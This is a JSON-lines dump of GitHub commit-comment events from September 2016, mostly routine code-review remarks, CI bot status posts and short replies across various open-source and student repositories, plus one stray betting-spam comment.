{"id":"4569066798","type":"CommitCommentEvent","actor":{"login":"dmitryd"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19039236,"position":null,"line":null,"path":null,"commit_id":"7154631c28981f1e1b67958c8ea6a46210fb17fa","created_at":"2016-09-15T16:07:35Z","updated_at":"2016-09-15T16:07:35Z","body":"Are you sure? I do not see that `/u` is needed there:\r\n\r\n```\r\nphp> echo preg_replace('/[\\s\\-+_]+/', '#', 'x' . html_entity_decode('&nbsp;') . 'x x');\r\nx x#x\r\n```"}},"created_at":"2016-09-15T16:07:35Z"}
{"id":"4569073535","type":"CommitCommentEvent","actor":{"login":"sameerbhatnagar"},"repo":{"name":"open-craft/dalite-ng"},"payload":{"comment":{"id":19039255,"position":null,"line":null,"path":null,"commit_id":"483b6ba1e6d5fa334618eeba37198ab93d1cdd6c","created_at":"2016-09-15T16:08:45Z","updated_at":"2016-09-15T16:08:45Z","body":"Thank you so much ! \r\n"}},"created_at":"2016-09-15T16:08:45Z"}
{"id":"4569073817","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19039258,"position":43,"line":43,"path":"issue11-2/result.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-15T16:08:48Z","updated_at":"2016-09-15T16:08:48Z","body":"ここあたりの記述も(できれば)構造はHTMLでつくり、必要な箇所だけPHPで書いてほしいのですが、詰まりそうであれば一旦おいておきましょう。"}},"created_at":"2016-09-15T16:08:48Z"}
{"id":"4569074725","type":"CommitCommentEvent","actor":{"login":"vasiokp"},"repo":{"name":"vasiokp/group_442_csharp"},"payload":{"comment":{"id":19039268,"position":14,"line":12,"path":"Лабораторна робота №1/Лабораторна робота №1/ResearchTeam.cs","commit_id":"6bed3bf3217d369ef5f3df3b09d68e4d4fd14a04","created_at":"2016-09-15T16:08:56Z","updated_at":"2016-09-15T16:08:56Z","body":"hmm"}},"created_at":"2016-09-15T16:08:56Z"}
{"id":"4569077965","type":"CommitCommentEvent","actor":{"login":"Coacher"},"repo":{"name":"nijel/enca"},"payload":{"comment":{"id":19039317,"position":null,"line":null,"path":null,"commit_id":"32e61f4e156ad6d1c973b94531b31ca9bcfec097","created_at":"2016-09-15T16:09:27Z","updated_at":"2016-09-15T16:09:27Z","body":"This is reverted because...?"}},"created_at":"2016-09-15T16:09:27Z"}
{"id":"4569078645","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039321,"position":36,"line":36,"path":"server/app/routes/members/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:09:34Z","updated_at":"2016-09-15T16:09:34Z","body":"Another note for the name of the route, I would add /signup instead of just /"}},"created_at":"2016-09-15T16:09:34Z"}
{"id":"4569079686","type":"CommitCommentEvent","actor":{"login":"pokutuna"},"repo":{"name":"pokutuna/isu5-practice"},"payload":{"comment":{"id":19039322,"position":null,"line":null,"path":null,"commit_id":"86a60aaf9279e21442888811e98b1a46298a5fdd","created_at":"2016-09-15T16:09:44Z","updated_at":"2016-09-15T16:09:44Z","body":"この段階でボトルネック変わってそう? \r\n`/` もうちょいできることありそうだけど `/friends` や `/diary/entries/*` をみてもいいかもな~\r\n\r\n```\r\n9696.7\r\n{\"success\"=>9441, \"redirect\"=>2557, \"failure\"=>1, \"error\"=>0, \"exception\"=>0}\r\nConnection to 13.78.88.53 closed.\r\n+-------+-------+-------+--------+-------+-------+-------+-------+--------+------------+------------+--------------+------------+--------+------------------------+\r\n| COUNT |  MIN  |  MAX  |  SUM   |  AVG  |  P1   |  P50  |  P99  | STDDEV | MIN(BODY)  | MAX(BODY)  |  SUM(BODY)   | AVG(BODY)  | METHOD |          URI           |\r\n+-------+-------+-------+--------+-------+-------+-------+-------+--------+------------+------------+--------------+------------+--------+------------------------+\r\n|     1 | 0.001 | 0.001 |  0.001 | 0.001 | 0.001 | 0.001 | 0.001 |  0.000 | 122540.000 | 122540.000 |   122540.000 | 122540.000 | GET    | /css/bootstrap.min.css |\r\n|   640 | 0.000 | 0.009 |  0.697 | 0.001 | 0.000 | 0.001 | 0.006 |  0.001 |   1033.000 |   1033.000 |   661120.000 |   1033.000 | GET    | /login                 |\r\n|   622 | 0.000 | 0.010 |  0.625 | 0.001 | 0.000 | 0.001 | 0.005 |  0.001 |      5.000 |      5.000 |     3110.000 |      5.000 | GET    | /logout                |\r\n|     1 | 0.013 | 0.013 |  0.013 | 0.013 | 0.013 | 0.013 | 0.013 |  0.000 |      5.000 |      5.000 |        5.000 |      5.000 | POST   | /profile/.*            |\r\n|   640 | 0.001 | 0.016 |  1.343 | 0.002 | 0.001 | 0.002 | 0.010 |  0.002 |      5.000 |      5.000 |     3200.000 |      5.000 | POST   | /login                 |\r\n|   623 | 0.002 | 0.024 |  3.223 | 0.005 | 0.002 | 0.004 | 0.017 |  0.003 |    721.000 |   5188.000 |  1991930.000 |   3197.319 | GET    | /footprints            |\r\n|   619 | 0.001 | 0.026 |  2.077 | 0.003 | 0.001 | 0.003 | 0.011 |  0.002 |      5.000 |      5.000 |     3095.000 |      5.000 | POST   | /diary/entry           |\r\n|  1860 | 0.001 | 0.027 | 13.344 | 0.007 | 0.002 | 0.006 | 0.019 |  0.004 |      5.000 |   6003.000 |  7911510.000 |   4253.500 | GET    | /profile/.*            |\r\n|    14 | 0.002 | 0.030 |  0.145 | 0.010 | 0.002 | 0.005 | 0.023 |  0.009 |      5.000 |      5.000 |       70.000 |      5.000 | POST   | /friends/.*            |\r\n|  1876 | 0.001 | 0.062 | 27.186 | 0.014 | 0.006 | 0.013 | 0.035 |  0.007 |      5.000 |  63279.000 | 57652017.000 |  30731.352 | GET    | /diary/entries/.*      |\r\n|   632 | 0.001 | 0.135 |  2.315 | 0.004 | 0.001 | 0.003 | 0.011 |  0.006 |      5.000 |      5.000 |     3160.000 |      5.000 | POST   | /diary/comment/\\d+     |\r\n|     1 | 0.152 | 0.152 |  0.152 | 0.152 | 0.152 | 0.152 | 0.152 |  0.000 |     11.000 |     11.000 |       11.000 |     11.000 | GET    | /initialize            |\r\n|  1866 | 0.002 | 0.282 |  8.615 | 0.005 | 0.001 | 0.003 | 0.015 |  0.011 |      5.000 |   5047.000 |  2996689.000 |   1605.943 | GET    | /diary/entry/\\d+       |\r\n|  1943 | 0.001 | 0.415 | 65.262 | 0.034 | 0.014 | 0.028 | 0.226 |  0.033 |      5.000 |  16886.000 | 30846666.000 |  15875.793 | GET    | /                      |\r\n|   661 | 0.049 | 0.437 | 95.184 | 0.144 | 0.058 | 0.140 | 0.232 |  0.039 |  11650.000 |  15020.000 |  8641839.000 |  13073.887 | GET    | /friends               |\r\n+-------+-------+-------+--------+-------+-------+-------+-------+--------+------------+------------+--------------+------------+--------+------------------------+\r\n```"}},"created_at":"2016-09-15T16:09:44Z"}
{"id":"4569082591","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19039338,"position":null,"line":null,"path":null,"commit_id":"28fdbfa4f8a6a03330555224f0a367b3860201e3","created_at":"2016-09-15T16:10:17Z","updated_at":"2016-09-15T16:10:17Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/471/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T16:10:17Z"}
{"id":"4569084828","type":"CommitCommentEvent","actor":{"login":"AloisMahdal"},"repo":{"name":"upgrades-migrations/preupgrade-assistant"},"payload":{"comment":{"id":19039348,"position":39,"line":822,"path":"preup/script_api.py","commit_id":"c0b5684a60e1620b356b13cf2315aa60601a72c2","created_at":"2016-09-15T16:10:39Z","updated_at":"2016-09-15T16:10:39Z","body":"Why only `IOError` and not any `Error`? What benefit does the change bring?"}},"created_at":"2016-09-15T16:10:39Z"}
{"id":"4569085655","type":"CommitCommentEvent","actor":{"login":"QuotableWater7"},"repo":{"name":"gaearon/redux-thunk"},"payload":{"comment":{"id":19039350,"position":null,"line":null,"path":null,"commit_id":"41aefcc28a80d2b21f8ee1e68639757bf6d7ba49","created_at":"2016-09-15T16:10:47Z","updated_at":"2016-09-15T16:10:47Z","body":"@gaearon I've been studying the source to learn various functional programming techniques and was curious - may I ask why this particular code change happened (or what it enabled)?  Thanks!"}},"created_at":"2016-09-15T16:10:47Z"}
{"id":"4569087380","type":"CommitCommentEvent","actor":{"login":"jaeandersson"},"repo":{"name":"casadi/casadi"},"payload":{"comment":{"id":19039354,"position":29,"line":1281,"path":"casadi/core/function/integrator.cpp","commit_id":"9f37e5a1ecdb4baef94564d0b3a0b1ba20e98d01","created_at":"2016-09-15T16:11:05Z","updated_at":"2016-09-15T16:11:05Z","body":"I don't remember. If changes it breaks something, you probably get the answer."}},"created_at":"2016-09-15T16:11:05Z"}
{"id":"4569087655","type":"CommitCommentEvent","actor":{"login":"murone"},"repo":{"name":"PredixDev/px-typography-design"},"payload":{"comment":{"id":19039355,"position":null,"line":null,"path":null,"commit_id":"17926bfda515de6a78550d405e3fcf9bd1ca3984","created_at":"2016-09-15T16:11:09Z","updated_at":"2016-09-15T16:11:09Z","body":"@mdwragg is this because we're no longer supposed to use GE Inspira, or do I find it in another element?"}},"created_at":"2016-09-15T16:11:09Z"}
{"id":"4569088117","type":"CommitCommentEvent","actor":{"login":"AloisMahdal"},"repo":{"name":"upgrades-migrations/preupgrade-assistant"},"payload":{"comment":{"id":19039356,"position":1,"line":792,"path":"preup/script_api.py","commit_id":"c0b5684a60e1620b356b13cf2315aa60601a72c2","created_at":"2016-09-15T16:11:15Z","updated_at":"2016-09-15T16:11:15Z","body":"still would break if `arg[1]` is an absolute path"}},"created_at":"2016-09-15T16:11:15Z"}
{"id":"4569090219","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039360,"position":44,"line":44,"path":"server/app/routes/members/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:11:35Z","updated_at":"2016-09-15T16:11:35Z","body":"Another note for the name of the route, I would add /signup instead of just /"}},"created_at":"2016-09-15T16:11:35Z"}
{"id":"4569091108","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039362,"position":28,"line":28,"path":"server/db/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:11:44Z","updated_at":"2016-09-15T16:11:44Z","body":"You may also want the reflexive version of this (`Product.belongsToMany(Order, {through: OrderProducts}))` — double check the Sequelize docs on this, but I think that while this is redundant from a SQL perspective (i.e. it doesn't affect the table at all) it means that both `Product` and `Order` have special instance methods for fetching each other."}},"created_at":"2016-09-15T16:11:44Z"}
{"id":"4569091163","type":"CommitCommentEvent","actor":{"login":"AloisMahdal"},"repo":{"name":"upgrades-migrations/preupgrade-assistant"},"payload":{"comment":{"id":19039364,"position":23,"line":806,"path":"preup/script_api.py","commit_id":"c0b5684a60e1620b356b13cf2315aa60601a72c2","created_at":"2016-09-15T16:11:44Z","updated_at":"2016-09-15T16:11:44Z","body":"still would break if `arg` is an absolute path"}},"created_at":"2016-09-15T16:11:44Z"}
{"id":"4569095316","type":"CommitCommentEvent","actor":{"login":"317070"},"repo":{"name":"nymanjens/Alliances"},"payload":{"comment":{"id":19039378,"position":null,"line":null,"path":null,"commit_id":"1ce734cf762b0b09f9c513a4a8b0004ed54c68db","created_at":"2016-09-15T16:12:28Z","updated_at":"2016-09-15T16:12:28Z","body":"But this way you know what is played in a sea region... if there is a token, it is a move. Otherwise, it is not a move.\r\nYou should be allowed to play anything, but only moves count."}},"created_at":"2016-09-15T16:12:28Z"}
{"id":"4569095365","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19039379,"position":null,"line":null,"path":null,"commit_id":"e9494152e977644bec904d68abc52c1067e8de48","created_at":"2016-09-15T16:12:28Z","updated_at":"2016-09-15T16:12:28Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-15T16:12:28Z"}
{"id":"4569095433","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039380,"position":13,"line":13,"path":"server/db/models/order.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:12:29Z","updated_at":"2016-09-15T16:12:29Z","body":"this sounds like a prime candidate for `Sequelize.ENUM`."}},"created_at":"2016-09-15T16:12:29Z"}
{"id":"4569098890","type":"CommitCommentEvent","actor":{"login":"juanprietob"},"repo":{"name":"ClementMirabel/shiny-tooth"},"payload":{"comment":{"id":19039390,"position":null,"line":null,"path":null,"commit_id":"c9d33d12a2ffb28a735d945f9118644e17407536","created_at":"2016-09-15T16:13:06Z","updated_at":"2016-09-15T16:13:06Z","body":"I don't agree with this. \r\nWe are using the dentist email which is a unique identifier in the system. \r\nWe never check for name at any point when we are creating a new user. "}},"created_at":"2016-09-15T16:13:06Z"}
{"id":"4569103172","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039400,"position":17,"line":17,"path":"server/db/models/order.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:13:47Z","updated_at":"2016-09-15T16:13:47Z","body":"Presumably you'd use this to allow guests (who still have a session) to look up their past orders? Sessions eventually expire so in general I'm not sure that it's necessary to record the session id. Food for thought."}},"created_at":"2016-09-15T16:13:47Z"}
{"id":"4569103707","type":"CommitCommentEvent","actor":{"login":"kyunooh"},"repo":{"name":"triplepy/sh8email-django"},"payload":{"comment":{"id":19039403,"position":21,"line":44,"path":"sh8core/models.py","commit_id":"3ffa83d9318e29305a6d6bc1a4d01ce188ed0dc2","created_at":"2016-09-15T16:13:53Z","updated_at":"2016-09-15T16:13:53Z","body":"Why didn't use bool(self.secret_code). Is it have any problem??"}},"created_at":"2016-09-15T16:13:53Z"}
{"id":"4569116456","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039441,"position":28,"line":28,"path":"server/db/models/order.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:16:09Z","updated_at":"2016-09-15T16:16:09Z","body":"may want more validations, e.g. zip codes must be 5 digits (double check that, haha)?"}},"created_at":"2016-09-15T16:16:09Z"}
{"id":"4569119563","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039450,"position":34,"line":34,"path":"server/db/models/order.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:16:38Z","updated_at":"2016-09-15T16:16:38Z","body":"similarly, there's an `isEmail` Sequelize validation which is helpful."}},"created_at":"2016-09-15T16:16:38Z"}
{"id":"4569120570","type":"CommitCommentEvent","actor":{"login":"zsilencer"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":19039453,"position":5,"line":262,"path":"src/world/sprite.c","commit_id":"318adc3fa83d98945297521589d4d32bdc41bc2a","created_at":"2016-09-15T16:16:49Z","updated_at":"2016-09-15T16:16:49Z","body":"Yeah I think this is saying there has to be at least 300 unused sprite before it will allow you to make a misc sprite (bl & 2) those can fail and it's checked but vehicle sprites are the ones that are not so if there gets to be more than 300 vehicles the game might also crash."}},"created_at":"2016-09-15T16:16:49Z"}
{"id":"4569121887","type":"CommitCommentEvent","actor":{"login":"cristiancadiaz"},"repo":{"name":"cristiancadiaz/Gestion-Hojas-de-Vida"},"payload":{"comment":{"id":19039457,"position":null,"line":null,"path":null,"commit_id":"fb5bf9d89fe5825487c492a7d6ec6ae818587785","created_at":"2016-09-15T16:17:02Z","updated_at":"2016-09-15T16:17:02Z","body":"Que sea cierto!! jaja"}},"created_at":"2016-09-15T16:17:02Z"}
{"id":"4569122300","type":"CommitCommentEvent","actor":{"login":"nijel"},"repo":{"name":"nijel/enca"},"payload":{"comment":{"id":19039460,"position":null,"line":null,"path":null,"commit_id":"32e61f4e156ad6d1c973b94531b31ca9bcfec097","created_at":"2016-09-15T16:17:08Z","updated_at":"2016-09-15T16:17:08Z","body":"Because with this patch iconv was not building at all. See 2cee706d7ce3e3fc074c98c635d8b2068c90fd0b which is after this has been reverted. I know this should have been written in the commit."}},"created_at":"2016-09-15T16:17:08Z"}
{"id":"4569125586","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039470,"position":12,"line":12,"path":"server/db/models/product.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:17:41Z","updated_at":"2016-09-15T16:17:41Z","body":"Should this be an array of `TEXT` or an array of `INTEGER`s?"}},"created_at":"2016-09-15T16:17:41Z"}
{"id":"4569128524","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19039477,"position":29,"line":1265,"path":"src/common/config/session-config.c","commit_id":"4d3949807d34f41d72269d49c9609116a00e98dc","created_at":"2016-09-15T16:18:13Z","updated_at":"2016-09-15T16:18:13Z","body":"This should be \r\n\r\n`\r\nelse {\r\n    if .....\r\n    if .....\r\n}\r\n`"}},"created_at":"2016-09-15T16:18:13Z"}
{"id":"4569133480","type":"CommitCommentEvent","actor":{"login":"Coacher"},"repo":{"name":"nijel/enca"},"payload":{"comment":{"id":19039488,"position":null,"line":null,"path":null,"commit_id":"32e61f4e156ad6d1c973b94531b31ca9bcfec097","created_at":"2016-09-15T16:19:04Z","updated_at":"2016-09-15T16:19:04Z","body":"I see. Thank you for the explanation."}},"created_at":"2016-09-15T16:19:04Z"}
{"id":"4569136107","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039493,"position":1,"line":1,"path":"server/app/routes/members/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:19:31Z","updated_at":"2016-09-15T16:19:31Z","body":"To make the code more DRY I would do this:\r\nrouter.param('id', function (req, res, next, id) {\r\n    User.findById(id)\r\n        .then(function (user) {\r\n            if (!user) res.status(404).send();\r\n            req.userById = user;\r\n            next();\r\n        })\r\n        .catch(next);\r\n});\r\n\r\nthen use userById in every other request "}},"created_at":"2016-09-15T16:19:31Z"}
{"id":"4569138247","type":"CommitCommentEvent","actor":{"login":"mdwragg"},"repo":{"name":"PredixDev/px-typography-design"},"payload":{"comment":{"id":19039496,"position":null,"line":null,"path":null,"commit_id":"17926bfda515de6a78550d405e3fcf9bd1ca3984","created_at":"2016-09-15T16:19:53Z","updated_at":"2016-09-15T16:19:53Z","body":"Hi @murone! Yep, Inspira is just for use in very select places now I believe. Inspira Sans is the font for all apps/web/digital."}},"created_at":"2016-09-15T16:19:53Z"}
{"id":"4569144095","type":"CommitCommentEvent","actor":{"login":"alternatebow"},"repo":{"name":"CS111C-META-FALL-2016/LabC-Team1"},"payload":{"comment":{"id":19039513,"position":10,"line":130,"path":"src/EntryWayList.java","commit_id":"195c49181db3bbe1d7bbcc5011de21e0b12d07fd","created_at":"2016-09-15T16:20:54Z","updated_at":"2016-09-15T16:20:54Z","body":"Yes. If we need to."}},"created_at":"2016-09-15T16:20:54Z"}
{"id":"4569144219","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19039514,"position":null,"line":null,"path":null,"commit_id":"420ba0b1e869d501cc086120f2f0f1892cc86e9f","created_at":"2016-09-15T16:20:55Z","updated_at":"2016-09-15T16:20:55Z","body":"When I refresh the page on the selected movie, nothing displays."}},"created_at":"2016-09-15T16:20:55Z"}
{"id":"4569148787","type":"CommitCommentEvent","actor":{"login":"devinivy"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039532,"position":8,"line":15,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:21:42Z","updated_at":"2016-09-15T16:21:42Z","body":"This mutates `internals`, which is probably not what you want to do!  Imagine what happens if two plugins use mail-licker 👯 "}},"created_at":"2016-09-15T16:21:42Z"}
{"id":"4569149484","type":"CommitCommentEvent","actor":{"login":"devinivy"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039533,"position":12,"line":18,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:21:49Z","updated_at":"2016-09-15T16:21:49Z","body":"Same!"}},"created_at":"2016-09-15T16:21:49Z"}
{"id":"4569150516","type":"CommitCommentEvent","actor":{"login":"devinivy"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039535,"position":19,"line":22,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:21:58Z","updated_at":"2016-09-15T16:21:58Z","body":"Same!"}},"created_at":"2016-09-15T16:21:58Z"}
{"id":"4569153657","type":"CommitCommentEvent","actor":{"login":"jaim1254"},"repo":{"name":"laanwj/etna_viv"},"payload":{"comment":{"id":19039541,"position":13,"line":17,"path":"src/etnaviv/state_vg.xml.h","commit_id":"5f85b522d13747deaa26229e0c9e9a076ad5a63b","created_at":"2016-09-15T16:22:30Z","updated_at":"2016-09-15T16:22:30Z","body":"apuestas-deportivasejemplo de como hacer apuestas deportivas on line ejemplo de como crear cuentas y hacer sus apuestas pinnaclesport\r\n"}},"created_at":"2016-09-15T16:22:30Z"}
{"id":"4569154900","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039543,"position":28,"line":28,"path":"server/db/models/product.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:22:43Z","updated_at":"2016-09-15T16:22:43Z","body":"Not sure you need double precision here (64 bits). Do you mean two-decimal precision? That's `DECIMAL(2)`."}},"created_at":"2016-09-15T16:22:43Z"}
{"id":"4569155752","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19039546,"position":null,"line":null,"path":null,"commit_id":"a8c65b4296ce37255860dfb6f08b750912f047c1","created_at":"2016-09-15T16:22:52Z","updated_at":"2016-09-15T16:22:52Z","body":"Temérdek nemo gtk warning volt eddig a logban. "}},"created_at":"2016-09-15T16:22:52Z"}
{"id":"4569155908","type":"CommitCommentEvent","actor":{"login":"devinivy"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039547,"position":8,"line":15,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:22:53Z","updated_at":"2016-09-15T16:22:53Z","body":"`Object.assign()` will mutate `internals.defaults`, which you don't want to do."}},"created_at":"2016-09-15T16:22:53Z"}
{"id":"4569156126","type":"CommitCommentEvent","actor":{"login":"PanPalitta"},"repo":{"name":"PanPalitta/phase_estimation"},"payload":{"comment":{"id":19039548,"position":241,"line":241,"path":"src/phase_loss_rand.cpp","commit_id":"297d4afdcfea38048ac7e741cff894764efff41b","created_at":"2016-09-15T16:22:55Z","updated_at":"2016-09-15T16:22:55Z","body":"Hi Christian,\n\nAre you saying that in your case it is a single-mode state? I don't \nquite understand what you're saying.\n\nOn 2016-09-15 6:13 AM, cgogolin wrote:\n>\n> I am concerned here about the Hilbertspace. The random states we talk \n> about here are random states from a fixed particle number subspace of \n> the fockspace of bosons. This is not the same as a random state over \n> the subspace spanned by the states in terms of which the WK states are \n> written.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/PanPalitta/phase_estimation/commit/297d4afdcfea38048ac7e741cff894764efff41b#commitcomment-19035111>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AJflRK9UKgxP0Z2VwtJeIRZLdUJwkTJQks5qqTZ-gaJpZM4J9yqB>.\n>\n\n\n\n---\nThis email has been checked for viruses by Avast antivirus software.\nhttps://www.avast.com/antivirus\n"}},"created_at":"2016-09-15T16:22:55Z"}
{"id":"4569158500","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19039554,"position":null,"line":null,"path":null,"commit_id":"d8f0bf3871427ff1c73453a31795c7437b37caf1","created_at":"2016-09-15T16:23:18Z","updated_at":"2016-09-15T16:23:18Z","body":"Initial commit."}},"created_at":"2016-09-15T16:23:18Z"}
{"id":"4569158832","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039555,"position":44,"line":44,"path":"server/app/routes/members/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:23:21Z","updated_at":"2016-09-15T16:23:21Z","body":"so the code here will look like this: \r\n```js\r\nrouter.post('/', function(req, res, next) {\r\nres.send(req.userById);\r\n}\r\n```"}},"created_at":"2016-09-15T16:23:21Z"}
{"id":"4569164400","type":"CommitCommentEvent","actor":{"login":"devinivy"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039567,"position":27,"line":28,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:24:21Z","updated_at":"2016-09-15T16:24:21Z","body":"This precludes having multiple instances of mail-licker."}},"created_at":"2016-09-15T16:24:21Z"}
{"id":"4569165276","type":"CommitCommentEvent","actor":{"login":"WilliamSWoodruff"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039570,"position":8,"line":15,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:24:29Z","updated_at":"2016-09-15T16:24:29Z","body":"How can I get a shared copy of that variable between functions? I thought that's what `internals` was intended for"}},"created_at":"2016-09-15T16:24:29Z"}
{"id":"4569167219","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19039574,"position":null,"line":null,"path":null,"commit_id":"f2e5149319e4ed4a86c9f5e3f3bef1b89d06cd19","created_at":"2016-09-15T16:24:51Z","updated_at":"2016-09-15T16:24:51Z","body":"Also see [Integer 274: Solaris, integer.cpp and \"Types cannot be declared in anonymous union\"](https://github.com/weidai11/cryptopp/issues/274)."}},"created_at":"2016-09-15T16:24:51Z"}
{"id":"4569167335","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039575,"position":56,"line":56,"path":"server/app/routes/members/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:24:53Z","updated_at":"2016-09-15T16:24:53Z","body":"so the code here will look like this: \r\n```js\r\nrouter.post('/', function(req, res, next) {\r\n  res.send(req.userById);\r\n}\r\n```"}},"created_at":"2016-09-15T16:24:53Z"}
{"id":"4569167621","type":"CommitCommentEvent","actor":{"login":"NoemiElisa"},"repo":{"name":"rvm/rvm"},"payload":{"comment":{"id":19039577,"position":6,"line":58,"path":"scripts/functions/requirements/cygwin","commit_id":"36fabf94bf9cec38774677ae568e2cf3af7be5a7","created_at":"2016-09-15T16:24:56Z","updated_at":"2016-09-15T16:24:56Z","body":"@mpapis  : Should this not be != instead of ==?\r\nThis is related to: https://github.com/rvm/rvm/issues/2736\r\nI have changed it locally and it is not showing me that error message anymore. "}},"created_at":"2016-09-15T16:24:56Z"}
{"id":"4569171177","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039584,"position":8,"line":8,"path":"server/db/models/review.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:25:32Z","updated_at":"2016-09-15T16:25:32Z","body":"yay validations"}},"created_at":"2016-09-15T16:25:32Z"}
